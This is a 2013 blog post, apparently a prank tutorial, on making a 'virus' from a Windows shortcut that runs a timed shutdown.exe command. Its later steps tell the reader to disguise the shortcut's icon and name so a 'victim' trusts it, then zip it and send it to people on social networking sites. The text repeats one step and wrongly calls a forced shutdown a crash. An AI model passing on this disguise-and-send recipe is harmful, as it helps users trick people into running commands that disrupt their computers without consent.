Monday, January 28, 2013

How to make a virus & crash p.c

How to make a virus & crash p.c

Step 1: Right click on desktop, and then go New, then Shortcut.

Step 2: Then in the "type location of the item" you type this following lines or copy paste:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus" (or anything u want, remember this is a message)

Step 3: Click next and then after Finish.

Step 4: After you have finished, now the task is to fool your victim.

Step 5: The next task is to change the icon and name of the program so that he/she can trust your program.

Step 6: To change the icon right click on your file then "Change icon". Now the icon will appear something you selected and rename it to something you can bluff.

Step 7: After you have finished, now the task is to fool your victim.

Step 8: Now keep it in a zip/rar file and send it to anyone on any social networking site.

And finally when your friends opens it.... Sytem Program crashes...!!!

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